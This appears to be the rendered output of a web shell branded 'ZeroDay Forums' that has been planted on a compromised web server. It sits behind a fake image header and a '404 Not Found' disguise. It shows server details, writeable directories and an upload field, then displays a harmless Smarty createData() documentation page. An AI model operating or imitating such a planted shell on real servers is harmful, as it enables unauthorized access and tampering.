����JFIF��� ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /var/www/html/netphim/vendor/smarty/smarty/docs/programmers/api-functions/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/html/netphim/vendor/smarty/smarty/docs/programmers/api-functions/api-create-data.md
createData()

creates a data object

Description
===========

string

createData

object

parent

string

createData

This creates a data object which will hold assigned variables. It uses
the following parameters:

-   `parent` is an optional parameter. It is an uplink to the main
    Smarty object, a another user-created data object or to user-created
    template object. These objects can be chained. Templates can access
    variables assigned to any of the objects in it\'s parent chain.

Data objects are used to create scopes for assigned variables. They can
be used to control which variables are seen by which templates.


    <?php
    include('Smarty.class.php');
    $smarty = new Smarty;

    // create data object with its private variable scope
    $data = $smarty->createData();

    // assign variable to data scope
    $data->assign('foo','bar');

    // create template object which will use variables from data object
    $tpl = $smarty->createTemplate('index.tpl',$data);

    // display the template
    $tpl->display();
    ?>

        

See also [`display()`](#api.display), and
[`createTemplate()`](#api.create.template),

ZeroDay Forums Mini